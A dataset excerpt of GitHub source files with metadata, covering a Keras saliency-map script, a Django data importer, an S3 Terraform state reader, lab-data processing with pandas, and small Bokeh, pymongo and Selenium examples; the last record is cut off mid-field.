Dataset schema (each record below lists these fields in this order):

| column | dtype | range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 2–616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–69 |
| license_type | string | 2 values |
| repo_name | string | length 5–118 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | length 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M, nullable (⌀) |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 values |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 values |
| src_encoding | string | 30 values |
| language | string | 1 value |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 values |
| content | string | length 2–10.3M |
| authors | list | length 1–1 |
| author_id | string | length 0–212 |
45ff041f7e53bb10b214960460aa86afe0a500b6
|
91a916f2300a8ec46c0ce59b5feea0ae4d30d921
|
/hw3/saliency_map.py
|
91e1f188aa077e82b29f548a09a573928106fdbd
|
[] |
no_license
|
andy920262/ML2017
|
9130e18eb5d3be13cac0177cc80e0ed2655ebf63
|
8a63ca87c9a4bad848506fcf73efd09438751a29
|
refs/heads/master
| 2021-03-30T17:37:52.511875
| 2017-06-02T11:47:32
| 2017-06-02T11:47:32
| 82,885,039
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,483
|
py
|
import matplotlib
matplotlib.use('Agg')
import argparse
from keras.models import load_model
import keras.backend as K
from keras.utils import *
import numpy as np
import matplotlib.pyplot as plt
from data_process import load_data
if __name__ == '__main__':
    model_path = 'best_model'
emotion_classifier = load_model(model_path)
private_pixels = load_data('test.csv', 'test')
private_pixels = [x.reshape(1, 48, 48, 1) for x in private_pixels]
input_img = emotion_classifier.input
img_ids = [7122]
for idx in img_ids:
val_proba = emotion_classifier.predict(private_pixels[idx])
pred = val_proba.argmax(axis=-1)
target = K.mean(emotion_classifier.output[:, pred])
grads = K.gradients(target, input_img)[0]
fn = K.function([input_img, K.learning_phase()], [grads])
#print(fn([private_pixels[idx], True]))
heatmap = fn([private_pixels[idx], False])
heatmap = np.array(heatmap).reshape(48, 48)
'''
Implement your heatmap processing here!
        hint: Do some normalization or smoothing on grads
'''
thres = np.mean(np.abs(heatmap))
see = private_pixels[idx].reshape(48, 48)
#see[np.where(np.abs(heatmap) <= thres)] = np.mean(see)
plt.figure()
plt.imshow(heatmap, cmap=plt.cm.jet)
plt.colorbar()
plt.tight_layout()
fig = plt.gcf()
plt.draw()
fig.savefig('heatmap{}.png'.format(idx))
plt.figure()
plt.imshow(see,cmap='gray')
plt.colorbar()
plt.tight_layout()
fig = plt.gcf()
plt.draw()
fig.savefig('see{}.png'.format(idx))
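The placeholder above asks for heatmap post-processing. A minimal sketch of the normalization/smoothing the hint points at (the function name, `eps`, and `sigma` are illustrative, not from the original):

```python
import numpy as np
from scipy.ndimage import gaussian_filter  # optional smoothing step

def normalize_heatmap(heatmap, eps=1e-8, sigma=1.0):
    """Map absolute gradient magnitudes to [0, 1] for display."""
    h = np.abs(heatmap)
    h = gaussian_filter(h, sigma=sigma)  # smooth the raw gradients
    return (h - h.min()) / (h.max() - h.min() + eps)
```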
|
[
"920262@gmail.com"
] |
920262@gmail.com
|
b11dfdfda95299179c32d624dade4b02b6109105
|
c90970d4535c1fb74fbb841dc5029b5a0faca48e
|
/decisions/importer/open_ahjo.py
|
2309bceb60a26bc8a275694c3fad3b1330710ba2
|
[] |
no_license
|
Metatavu/paatos
|
03a6a3b3a85b367b8cddb24425f7f56025bf5520
|
f597a0e2ac781b916c7a7c2d88afc501bf60c995
|
refs/heads/master
| 2021-01-20T00:40:23.203263
| 2017-09-29T10:48:16
| 2017-09-29T10:48:16
| 89,169,399
| 0
| 0
| null | 2017-05-29T22:02:08
| 2017-04-23T20:11:13
|
Python
|
UTF-8
|
Python
| false
| false
| 9,570
|
py
|
# -*- coding: utf-8 -*-
import json
from django.conf import settings
from decisions.models import (
Action, Attachment, Case, CaseGeometry, Content, DataSource, Event, Function, Organization, Post
)
from .base import Importer
class OpenAhjoImporter(Importer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.data_source, created = DataSource.objects.get_or_create(
identifier='open_ahjo',
defaults={'name': 'Open Ahjo'}
)
if created:
self.logger.debug('Created new data source "open_ahjo"')
self.meeting_to_org = None
def _import_functions(self, data):
self.logger.info('Importing functions...')
for function_data in data['categories']:
defaults = dict(
name=function_data['name'],
function_id=function_data['origin_id'],
)
parent_id = function_data['parent']
if parent_id:
try:
defaults['parent'] = Function.objects.get(origin_id=parent_id)
except Function.DoesNotExist:
                    self.logger.error('Function parent %s does not exist' % parent_id)
continue
function, created = Function.objects.update_or_create(
origin_id=function_data['id'],
data_source=self.data_source,
defaults=defaults
)
if created:
self.logger.info('Created function %s' % function)
def _import_events(self, data):
self.logger.info('Importing events...')
for meeting_data in data['meetings']:
defaults = dict(
start_date=meeting_data['date'],
end_date=meeting_data['date'],
)
organization_data = self.meeting_to_org.get(meeting_data['id'])
if organization_data:
if organization_data['type'] == 'office_holder':
continue
try:
organization = Organization.objects.get(origin_id=organization_data['origin_id'])
defaults['organization'] = organization
except Organization.DoesNotExist:
self.logger.error('Organization %s does not exist' % organization_data['origin_id'])
continue
event, created = Event.objects.update_or_create(
data_source=self.data_source,
origin_id=meeting_data['id'],
defaults=defaults
)
if created:
self.logger.info('Created event %s' % event)
def _import_case_geometries(self, data):
self.logger.info('Importing case geometries...')
for geometry_data in data['issue_geometries']:
defaults = dict(
name=geometry_data['name'],
type=geometry_data['type'],
geometry=geometry_data['geometry'],
)
case_geometry, created = CaseGeometry.objects.update_or_create(
data_source=self.data_source,
origin_id=geometry_data['id'],
defaults=defaults,
)
if created:
self.logger.info('Created case geometry %s' % case_geometry)
def _import_cases(self, data):
self.logger.info('Importing cases...')
for issue_data in data['issues']:
defaults = dict(
title=issue_data['subject'],
register_id=issue_data['register_id'],
)
try:
defaults['function'] = Function.objects.get(origin_id=issue_data['category'])
except Function.DoesNotExist:
self.logger.error('Function %s does not exist' % issue_data['category'])
continue
case, created = Case.objects.update_or_create(
data_source=self.data_source,
origin_id=issue_data['id'],
defaults=defaults,
)
if created:
self.logger.info('Created case %s' % case)
case.geometries = CaseGeometry.objects.filter(origin_id__in=issue_data['geometries'])
def _import_actions(self, data):
self.logger.info('Importing actions...')
for agenda_item_data in data['agenda_items']:
org = self.meeting_to_org.get(agenda_item_data['meeting'])
if not org:
self.logger.error('Cannot find matching org for meeting %s' % agenda_item_data['meeting'])
continue
defaults = dict(
title=agenda_item_data['subject'],
ordering=agenda_item_data['index'],
resolution=agenda_item_data['resolution'] or '',
)
if agenda_item_data['issue']:
try:
case = Case.objects.get(origin_id=agenda_item_data['issue'])
defaults['case'] = case
except Case.DoesNotExist:
self.logger.error('Case %s does not exist' % agenda_item_data['issue'])
continue
if org['type'] == 'office_holder':
try:
post = Post.objects.get(origin_id=org['origin_id'])
defaults['post'] = post
except Post.DoesNotExist:
self.logger.error('Post %s does not exist' % org['origin_id'])
continue
else:
try:
event = Event.objects.get(origin_id=agenda_item_data['meeting'])
defaults['event'] = event
except Event.DoesNotExist:
self.logger.error('Event %s does not exist' % agenda_item_data['meeting'])
continue
action, created = Action.objects.update_or_create(
data_source=self.data_source,
origin_id=agenda_item_data['id'],
defaults=defaults
)
if created:
self.logger.info('Created action %s' % action)
def _import_contents(self, data):
self.logger.info('Importing contents...')
for content_section_data in data['content_sections']:
defaults = dict(
hypertext=content_section_data['text'],
type=content_section_data['type'],
ordering=content_section_data['index'],
)
action_id = content_section_data.get('agenda_item')
try:
action = Action.objects.get(origin_id=action_id)
defaults['action'] = action
except Action.DoesNotExist:
self.logger.error('Action %s does not exist' % action_id)
continue
content, created = Content.objects.update_or_create(
data_source=self.data_source,
origin_id=content_section_data['id'],
defaults=defaults
)
if created:
self.logger.info('Created content %s' % content)
def _import_attachments(self, data):
self.logger.info('Importing attachments...')
url_base = getattr(settings, 'OPEN_AHJO_ATTACHMENT_URL_BASE', None)
for attachment_data in data['attachments']:
defaults = dict(
name=attachment_data['name'] or '',
url=url_base + attachment_data['url'] if attachment_data['url'] and url_base else '',
number=attachment_data['number'],
public=attachment_data['public'],
confidentiality_reason=attachment_data['confidentiality_reason'] or '',
)
action_id = attachment_data.get('agenda_item')
try:
action = Action.objects.get(origin_id=action_id)
defaults['action'] = action
except Action.DoesNotExist:
self.logger.error('Action %s does not exist' % action_id)
continue
attachment, created = Attachment.objects.update_or_create(
data_source=self.data_source,
origin_id=attachment_data['id'],
defaults=defaults
)
if created:
self.logger.info('Created attachment %s' % attachment)
def import_data(self):
self.logger.info('Importing open ahjo data...')
with open(self.options['filename'], 'r') as data_file:
data = json.load(data_file)
# pre calc meeting to org mapping
org_dict = {o['origin_id']: o for o in data['organizations']}
policymaker_to_org = {p['id']: org_dict[p['origin_id']] for p in data['policymakers']}
self.meeting_to_org = {m['id']: policymaker_to_org[m['policymaker']] for m in data['meetings']}
if self.options['flush']:
self.logger.info('Deleting all objects first...')
Function.objects.all().delete()
Event.objects.all().delete()
CaseGeometry.objects.all().delete()
Action.objects.all().delete()
Content.objects.all().delete()
Attachment.objects.all().delete()
self._import_functions(data)
self._import_events(data)
self._import_case_geometries(data)
self._import_cases(data)
self._import_actions(data)
self._import_contents(data)
self._import_attachments(data)
self.logger.info('Import done!')
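The `Importer` base class is not shown in this snippet, so its constructor signature is an assumption; based on the `self.options['filename']` and `self.options['flush']` reads above, a plausible driver looks like:

```python
# Hypothetical invocation; the options keys come from import_data() above,
# but the constructor signature of the unseen Importer base class is assumed.
importer = OpenAhjoImporter(options={'filename': 'open_ahjo_dump.json', 'flush': False})
importer.import_data()
```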
|
[
"tuomas.haapala@anders.fi"
] |
tuomas.haapala@anders.fi
|
0e42a6e1f8d9efb5a8261f2ad51f074b8eacea2e
|
38e277526f58eb08ac12257c0297b9d46c421c75
|
/himl/remote_state.py
|
14ea6b5309578c2b471ed2077aa64ad433d98122
|
[
"Apache-2.0"
] |
permissive
|
adobe/himl
|
fdfdbc83caea55d67df8a3bf885b56d80b6bf8f9
|
eb447d157ddd02ef41a07ae0d705e4d3bf6e8d23
|
refs/heads/master
| 2023-09-04T03:35:15.369780
| 2023-08-06T19:35:55
| 2023-08-06T19:35:55
| 202,412,608
| 107
| 31
|
Apache-2.0
| 2023-09-12T12:51:41
| 2019-08-14T19:23:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,499
|
py
|
# Copyright 2019 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
import json
import boto3
class S3TerraformRemoteStateRetriever:
@staticmethod
def get_s3_client(bucket_name, bucket_key, boto_profile):
session = boto3.session.Session(profile_name=boto_profile)
client = session.client('s3')
try:
bucket_object = client.get_object(Bucket=bucket_name, Key=bucket_key)["Body"].read()
return json.loads(bucket_object)
        except (client.exceptions.NoSuchKey, client.exceptions.NoSuchBucket):
            # fall back to an empty mapping so callers can still test for "outputs"
            return {}
def get_dynamic_data(self, remote_states):
generated_data = {"outputs": {}}
for state in remote_states:
bucket_object = self.get_s3_client(state["s3_bucket"], state["s3_key"], state["aws_profile"])
if "outputs" in bucket_object:
generated_data["outputs"][state["name"]] = bucket_object["outputs"]
return generated_data
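A usage sketch under assumed inputs (bucket, key, and profile names are placeholders):

```python
retriever = S3TerraformRemoteStateRetriever()
remote_states = [{
    "name": "network",                      # key used under generated_data["outputs"]
    "s3_bucket": "my-terraform-state",      # placeholder bucket name
    "s3_key": "network/terraform.tfstate",  # placeholder state file key
    "aws_profile": "default",
}]
data = retriever.get_dynamic_data(remote_states)
# data == {"outputs": {"network": {...}}} when the state file defines outputs
```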
|
[
"costimuraru@gmail.com"
] |
costimuraru@gmail.com
|
613c3df38389bc3ad844a0136c1505cb0f96e312
|
3c61d38436f746729a3b810bbe33926593816223
|
/data_processing/namibia/combo_data_processing_WIP.py
|
be2240f874b3dd81b26b598830198940273b665b
|
[] |
no_license
|
PATH-Global-Health/DIAMETER
|
b9eb01a288eb6af8c6b4dbf059047cfce07e22c3
|
ade4cfd1497351ef2fc1e3f4846c2d0ae00c1abd
|
refs/heads/master
| 2020-05-25T08:54:46.576250
| 2020-04-17T17:09:53
| 2020-04-17T17:09:53
| 187,721,605
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,074
|
py
|
import os
import argparse
import numpy as np
import pandas as pd
from functools import partial, reduce
# import helper functions
from data_processing_helpers import (run_compare, return_decisions,
fix_concentrations, split_time,
remove_time, read_data)
# import constants
from data_processing_helpers import THRESHOLDS
# function for combining duplicates
def deduplicate(duplicate_df, plex):
# create an empty list to fill with small dfs, which will be combined
deduped_dfs = []
# iterate over analytes
for analyte in THRESHOLDS[plex].keys():
# subset to columns of interest
dup_analyte = duplicate_df[['patient_id', 'well', 'error', 'concentration', analyte]]
pid_dfs = []
# iterate over patient_ids
for pid in duplicate_df['patient_id'].unique():
# subset to specific patient_id
dup_data = dup_analyte.loc[dup_analyte['patient_id'] == pid]
con_dfs = []
# iterate over duplicate concentrations
for concentration in dup_data['concentration'].unique():
# create an empty dataframe to fill
fill_df = pd.DataFrame(columns=['patient_id', 'well', 'error',
'concentration', analyte])
# subset to specific concentration value
dup_con = dup_data.loc[dup_data['concentration'] == concentration]
# get the values for the duplicate concentrations
values = dup_con[analyte]
# also preserve wells and errors for duplicate concentrations
wells = dup_con['well'].tolist()
wells = ''.join(c for c in str(wells) if c not in ["[", "]", "'"])
errors = dup_con['error'].tolist()
non_nan_error = [e for e in errors if e is not np.nan]
if non_nan_error:
errors = non_nan_error
else:
errors = np.nan
try:
# if they're both real numbers, take the average
values = [float(val) for val in values.tolist()]
val = sum(values) / len(values)
except ValueError:
# otherwise...
values = values.tolist()
num_vals = [val for val in values if ('<' not in val) & ('>' not in val)]
# if one is a real number, take that one
if len(num_vals) == 1:
val = num_vals[0]
# if both are non-real, we assume they're the same. maybe sketchy?
else:
val = values[0]
# add values to empty dataframe
fill_df = fill_df.append({'patient_id': pid, 'well': wells, 'error': errors,
'concentration': concentration, analyte: val}, ignore_index=True)
con_dfs.append(fill_df)
con_df = pd.concat(con_dfs)
pid_dfs.append(con_df)
pid_df = pd.concat(pid_dfs)
deduped_dfs.append(pid_df)
deduped = reduce(lambda left, right: pd.merge(left, right, on=['patient_id', 'well', 'error', 'concentration']),
deduped_dfs)
return deduped
# function for determining which dilution value to use
def decider(base_df, plex, base_dil):
# create an empty list to fill with small dfs, which will be combined
analyte_dfs = []
# create an empty dictionary to fill with errors associated with patient IDs
error_pids = {}
# iterate over analytes
for analyte in THRESHOLDS[plex].keys():
patient_dfs = []
# iterate over patient_ids
for pid in base_df['patient_id'].unique():
patient_data = base_df.loc[base_df['patient_id'] == pid]
# get number of dilutions
dilution_values = sorted([val for val in patient_data['concentration'].unique() if val != '1'], key=len)
# set initial best decision to neat (1)
best_decision = '1'
# iterate over dilution values
for max_dilution in dilution_values:
# subset to dilutions
dil_data = patient_data.loc[patient_data['concentration'].isin([best_decision, max_dilution])]
# create partial function for generating decision vectors
partial_compare = partial(run_compare, analyte_val=analyte, dil_val=max_dilution, base=base_dil)
# generate decision vectors
dil_data['decision_vector'] = dil_data.apply(partial_compare, axis=1)
# pull decision matrix for given analyte and concentrations
decisions = return_decisions(best_decision, max_dilution)
decision_matrix = decisions[analyte]
# construct empty dataframe to hold best values
best_df = pd.DataFrame(columns=['patient_id', 'errors', analyte,
'{}_dilution'.format(analyte),
'{}_well'.format(analyte)])
# get decision vectors for each possible decision
vector_low = dil_data.loc[dil_data['concentration'] == best_decision,
'decision_vector'].item()
vector_high = dil_data.loc[dil_data['concentration'] == max_dilution,
'decision_vector'].item()
# get actual decision from decision vectors
decision = decision_matrix[vector_high, vector_low].item()
# set value, well, and error based on decision
if decision in [best_decision, max_dilution]:
val = dil_data.loc[dil_data['concentration'] == decision,
analyte].item()
well = dil_data.loc[dil_data['concentration'] == decision,
'well'].item()
error = dil_data.loc[dil_data['concentration'] == decision,
'error'].item()
elif decision == 'fail':
val = 'fail'
well = 'fail'
error = np.nan
error_pids[pid] = '{} failure'.format(analyte)
else:
raise ValueError("Unexpected decision value: {}".format(decision))
# preserve the unselected dilutions
other_dilutions = [val for val in patient_data['concentration'].unique()]
other_dilutions = [float(val) for val in other_dilutions if val != 'fail']
# preserve the maximum dilution, selected or unselected
max_dilution = max(other_dilutions)
# preserve the selected dilution
df_decision = decision if decision != 'fail' else np.nan
# put all preserved/selected values into the empty dataframe
best_df = best_df.append({'patient_id': pid, 'errors': error, analyte: val,
'{}_dilution'.format(analyte): df_decision,
'{}_well'.format(analyte): well,
'{}_max_dilution'.format(analyte): max_dilution}, ignore_index=True)
best_decision = decision
if decision == 'fail':
break
patient_dfs.append(best_df)
patient_df = pd.concat(patient_dfs)
# set all error columns to object for combination later
patient_df['errors'] = patient_df['errors'].astype('object')
analyte_dfs.append(patient_df)
decided = reduce(lambda left, right: pd.merge(left, right, on='patient_id'), analyte_dfs)
# loop through associated error/patient ID pairs
for pid in error_pids.keys():
# subset to individual error(s) associated to patient ID
error = error_pids[pid]
# subset dataframe to patient ID where error occurs
pid_df = decided.loc[decided['patient_id'] == pid]
# combine all the errors into one big error message
pid_df['errors'] = pid_df['errors'].apply(lambda x: error if np.isnan(x) else x + ' ' + error)
# if there's actually an error...
if len(pid_df) > 0:
# ...replace current dataframe info with the info that contains the error
decided = decided.loc[decided['patient_id'] != pid]
decided = decided.append(pid_df)
return decided
def main(input_dir, input_folder, plex, base_dil):
dfs = []
input_path = '{}/input_data/{}'.format(input_dir, input_folder)
# get all input data, combine into one df
for fname in os.listdir(input_path):
        plex_data = read_data(input_path, fname, plex)
# convert all strings to lowercase
plex_data = plex_data.applymap(lambda x: x.lower() if isinstance(x, str) else x)
        # fill empty patient_ids from the preceding patient_id
plex_data['patient_id'] = plex_data['patient_id'].fillna(method='ffill')
# drop patient_ids that are still null
plex_data = plex_data[~plex_data['patient_id'].isnull()]
dfs.append(plex_data)
samples_data = pd.concat(dfs)
# subset data to just what we want
samples_data = samples_data.loc[~samples_data['type'].isnull()]
if plex == 4:
samples_data = samples_data.loc[~samples_data['type'].str.contains('pixel')]
samples_data = samples_data.loc[samples_data['patient_id'].str.contains('pa-')]
elif plex == 5:
samples_data = samples_data.loc[~samples_data['patient_id'].str.contains('ctrl')]
samples_data = samples_data.loc[~samples_data['type'].str.contains('replicate')]
samples_data = samples_data.loc[~samples_data['type'].isnull()]
samples_data = samples_data.drop('type', axis=1)
# break out concentration from patient string
samples_data['concentration'] = samples_data['patient_id'].apply(lambda x: x.split(' ')[-1])
if plex == 4:
samples_data['patient_id'] = samples_data['patient_id'].apply(lambda x: x.partition(' ')[0])
elif plex == 5:
samples_data['patient_id'] = samples_data['patient_id'].apply(lambda x: '_'.join(x.split(' ')[:3]).replace('/',
'_'))
# remove concentration values we don't want
samples_data = samples_data.loc[(samples_data['concentration'].str.contains('neat|{}'.format(base_dil)))]
samples_data = samples_data.loc[~samples_data['concentration'].str.contains('low volume')]
# remove rows where "well" is null
samples_data = samples_data.loc[~samples_data['well'].isnull()]
# make concentrations more machine/human readable
samples_data['concentration'] = samples_data.apply(fix_concentrations, axis=1)
samples_data = samples_data.sort_values(['patient_id', 'concentration'])
# subset the data to just duplicates
duplicates = samples_data.loc[samples_data.duplicated(subset=['patient_id', 'concentration'], keep=False)]
# run deduplicating function, return deduplicated df
    deduped = deduplicate(duplicates, plex)
    # replace old duplicated values with new deduplicated values
no_duplicates = samples_data.drop_duplicates(subset=['patient_id', 'concentration'], keep=False)
no_duplicates = pd.concat([no_duplicates, deduped])
# run decision function
    output_df = decider(no_duplicates, plex, base_dil)
if plex == 4:
# split time associated with patient_id into its own column
output_df['time_point_days'] = output_df.apply(split_time, axis=1)
output_df['patient_id'] = output_df.apply(remove_time, axis=1)
# sort values
output_df.sort_values(['patient_id', 'time_point_days'], inplace=True)
output_df.set_index(['patient_id', 'time_point_days'], inplace=True)
elif plex == 5:
# sort values and output to a csv
output_df.sort_values('patient_id', inplace=True)
output_df.set_index('patient_id', inplace=True)
output_df.to_csv('{}/output_data/{}_final_dilutions.csv'.format(input_dir, input_folder))
# also output a csv of partially formatted data, for vetting
partial_format = samples_data.copy(deep=True)
if plex == 4:
# split time associated with patient_id into its own column
partial_format['time_point_days'] = partial_format.apply(split_time, axis=1)
partial_format['patient_id'] = partial_format.apply(remove_time, axis=1)
# sort values
partial_format.sort_values(['patient_id', 'time_point_days'], inplace=True)
partial_format.set_index(['patient_id', 'time_point_days'], inplace=True)
elif plex == 5:
# sort values
partial_format.sort_values('patient_id', inplace=True)
partial_format.set_index('patient_id', inplace=True)
partial_format.to_csv('{}/output_data/{}_partially_formatted.csv'.format(input_dir, input_folder))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-id', '--input_dir', type=str,
default='C:/Users/lzoeckler/Desktop/5plex',
help='Input directory')
parser.add_argument('-if', '--input_folder', type=str,
default='menzies_raw',
help='name of folder within input_dir containing data')
parser.add_argument('-p', '--plex', type=int,
default=5,
help="4plex vs 5plex (or any future nplex)")
parser.add_argument('-bd', '--base_dil', type=int,
default=50,
help='Base dilution value beyond neat (1)')
args = parser.parse_args()
main(input_dir=args.input_dir, input_folder=args.input_folder, plex=args.plex, base_dil=args.base_dil)
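The duplicate-combining rule buried in `deduplicate()` is easiest to see on small inputs. A standalone restatement of that try/except logic (illustrative only, not part of the pipeline):

```python
def combine_duplicates(values):
    """Average two numeric readings; prefer a single numeric reading over a
    censored one ('<x' / '>x'); if both are censored, keep the first."""
    try:
        nums = [float(v) for v in values]
        return sum(nums) / len(nums)
    except ValueError:
        numeric = [v for v in values if ('<' not in v) and ('>' not in v)]
        return numeric[0] if len(numeric) == 1 else values[0]

assert combine_duplicates(['1.5', '2.5']) == 2.0       # both numeric: average
assert combine_duplicates(['<0.5', '3.1']) == '3.1'    # one numeric: keep it
assert combine_duplicates(['<0.5', '<0.5']) == '<0.5'  # both censored: first
```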
|
[
"lzoeckler@path.org"
] |
lzoeckler@path.org
|
f8e07bb540bee57fc81311ca0de21bced5b6621b
|
9431bba2d148f8aef9c0a8f3ca16fcf875890757
|
/bokehExer/onlineSample/sliders.py
|
49abe74a8eaf11feee120636e60983bf5dbbdaf7
|
[
"MIT"
] |
permissive
|
terasakisatoshi/pythonCodes
|
fba0b78414b2c85f4a738200354ea583f0516768
|
953210c06e9885a7c885bc01047715a77de08a1a
|
refs/heads/master
| 2023-05-14T12:30:22.201711
| 2023-05-07T13:41:22
| 2023-05-07T13:41:22
| 197,893,702
| 2
| 1
|
MIT
| 2022-11-25T10:59:52
| 2019-07-20T07:09:12
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 420
|
py
|
from bokeh.plotting import figure, output_file, show
# prepare some data
x = [1, 2, 3, 4, 5]
y = [6, 7, 2, 4, 5]
# output to static HTML file
output_file("lines.html")
# create a new plot with a title and axis labels
p = figure(title="simple line example", x_axis_label='x', y_axis_label='y')
# add a line renderer with legend and line thickness
p.line(x, y, legend="Temp.", line_width=2)
# show the results
show(p)
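Note that Bokeh 1.4 deprecated the bare `legend` keyword used above; on newer Bokeh the renderer call would be spelled:

```python
# Bokeh >= 1.4: `legend_label` replaces the deprecated `legend` kwarg
p.line(x, y, legend_label="Temp.", line_width=2)
```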
|
[
"terasakisatoshi.math@gmail.com"
] |
terasakisatoshi.math@gmail.com
|
8de038635915ef8036b8a6253f37db06d8a39a01
|
fd0bf99070d83466101869f1a13e3cc408a2a101
|
/python/20130130_ORF_ID_to_Seq_ID.py
|
1a0268524b0c887de61d25e50ca404198c3a04ac
|
[] |
no_license
|
hkkenneth/lihs
|
eabf11173b5f09bdf70ebb6bb58e9bde711e03d8
|
02360939ca9e06e041ce21c99b729a2e12a28411
|
refs/heads/master
| 2021-01-10T10:04:05.807656
| 2013-03-04T15:24:58
| 2013-03-04T15:24:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
# Author: Kenneth Lui <hkkenneth@gmail.com>
# Last Updated on:
## Usage: python ~/code/python/20130130_ORF_ID_to_Seq_ID.py <INPUT> <OUTPUT>
import sys
if len(sys.argv) < 3:
raise SystemExit, 'use grep "##" ~/code/python/20130130_ORF_ID_to_Seq_ID.py to get usage'
outf = open(sys.argv[2], 'w')
for line in open(sys.argv[1], 'r'):
outf.write("%s\n" % line[:line.rfind("_")])
outf.close()
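The script maps each ORF ID back to its sequence ID by trimming everything from the last underscore onward; for example (the ID format here is hypothetical):

```python
orf_id = "NODE_12_length_345_1"    # hypothetical ORF ID: <sequence id>_<orf number>
print(orf_id[:orf_id.rfind("_")])  # NODE_12_length_345
```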
|
[
"hkkenneth@gmail.com"
] |
hkkenneth@gmail.com
|
a02cf0b3fcfbf26de5c7514aa15fd3ba61c07ab2
|
5cf85939610c9bc568665cb7c178589ef240c72d
|
/Assignment 6/Activity 2.py
|
c4791f99a4e9984f4eef2f89170a17c56af1b990
|
[] |
no_license
|
oboyanivskyy/CIS106-Oleg-Boyanivskyy
|
ffcb8c6cf73f8a343e9cedb53985ff9de056f95b
|
0d315cc0624e85bf3fcbc9c1505e58e8aa787fcd
|
refs/heads/main
| 2023-04-12T20:54:02.491062
| 2021-05-13T16:48:40
| 2021-05-13T16:48:40
| 331,188,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 945
|
py
|
# This updated program will take your age,
# and display your age in months, days, hours,
# and seconds.
def get_age():
print("Enter your age in years.")
age = float(input())
return age
def calc_months(age):
months = age * 12
return months
def calc_days(age):
days = age * 365
return days
def calc_hours(days):
hours = days * 24
return hours
def calc_seconds(hours):
seconds = hours * 60 * 60
return seconds
def display_result(months, days, hours, seconds):
print("You are " + str(months) + " months, ")
print(str(days) + " days, ")
print(str(hours) + " hours, and ")
print(str(seconds) + " seconds old ")
def main():
age = get_age()
months = calc_months(age)
days = calc_days(age)
hours = calc_hours(days)
seconds = calc_seconds(hours)
display_result(months, days, hours, seconds)
main()
|
[
"noreply@github.com"
] |
oboyanivskyy.noreply@github.com
|
6930553da58762d4c112efa76dd6dd1d0b19451b
|
b6fe842749ca288b5e7f048c149b04f035f62b93
|
/mydb/pymongo_insert_col_1.py
|
38b3e68f4f8023abb51adcc22f893011739831c9
|
[] |
no_license
|
zxcvbnm123xy/leon_python
|
c8fa74dd0186402b9edf7466f9a28a6fa586b17c
|
b68f5d5e8240c5a99ec7c155fb85f816ac0d54d1
|
refs/heads/master
| 2020-03-27T03:03:43.610701
| 2018-11-14T09:17:15
| 2018-11-14T09:17:15
| 145,836,887
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
# Load dependencies
import pymongo
# Create a connection
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
# Select the database mongo_python and the collection sites
mp = myclient["mongo_python"]
sites = mp["sites"]
# alexa ---> the site's global traffic-rank metric
document = {"name": "python", "alexa": "10000", "url": "https://www.python.com"}
ret = sites.insert_one(document)
print(ret)
## to print just the id of the inserted document, use ret.inserted_id
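`insert_one` returns an `InsertOneResult`; a short follow-up against the same collection showing the generated id and a bulk insert:

```python
print(ret.inserted_id)  # the ObjectId MongoDB assigned to the document

# insert_many returns an InsertManyResult with an .inserted_ids list
docs = [{"name": "github", "alexa": "100", "url": "https://www.github.com"},
        {"name": "bing", "alexa": "30", "url": "https://www.bing.com"}]
ret_many = sites.insert_many(docs)
print(ret_many.inserted_ids)
```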
|
[
"737878501@qq.com"
] |
737878501@qq.com
|
3bc01818033d523d7c3c35a5753db7099d003ea7
|
ddeadd0accfb2f640f2bb7d47a3336b601e1d65b
|
/spider/renniso/article/selenium_test.py
|
818b04dcdc3868ce4b1d735104604acf0d25c8fb
|
[] |
no_license
|
wuxinchaliu/python
|
ff25ed61bb9b0f83bd74243abcd09c1ec154d45e
|
f39751797efc7aeb184fa994f7187b7779fbd301
|
refs/heads/master
| 2021-01-21T04:55:41.347045
| 2016-06-22T06:38:02
| 2016-06-22T06:38:02
| 53,824,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 699
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
import time
import os
import sys
reload(sys)
sys.setdefaultencoding('utf8')
chromedriver = "/usr/local/bin/chromedriver"
os.environ["webdriver.chrome.driver"] = chromedriver
browser = webdriver.Chrome(chromedriver)
# browser.get("http://www.baidu.com/")
#
# time.sleep(3)
#
# browser.find_element_by_id('kw').send_keys("zhangyanqing")
# browser.find_element_by_id('su').click()
# browser.get("http://www.hnebbs.com/")
url = "http://www.bdsola.com/d/9224.html"
browser.get(url)
print browser.page_source
browser.get("http://www.bdsola.com/d/9234.html")
print '2'
browser.get("http://www.bdsola.com/d/9244.html")
print '3'
browser.close()
|
[
"qi138138lin@163.com"
] |
qi138138lin@163.com
|
165d2c9f59136e1444d55600d106600c891f6da2
|
abcaaaea2c40b175351116599026273ff86d9282
|
/qaserver/libs/query.py
|
eed035c9fdb128a46615e5422870fed35409689f
|
[] |
no_license
|
afterimagex/QAServer
|
01ff21740e5617a18546869d21a8f372bc9d9e27
|
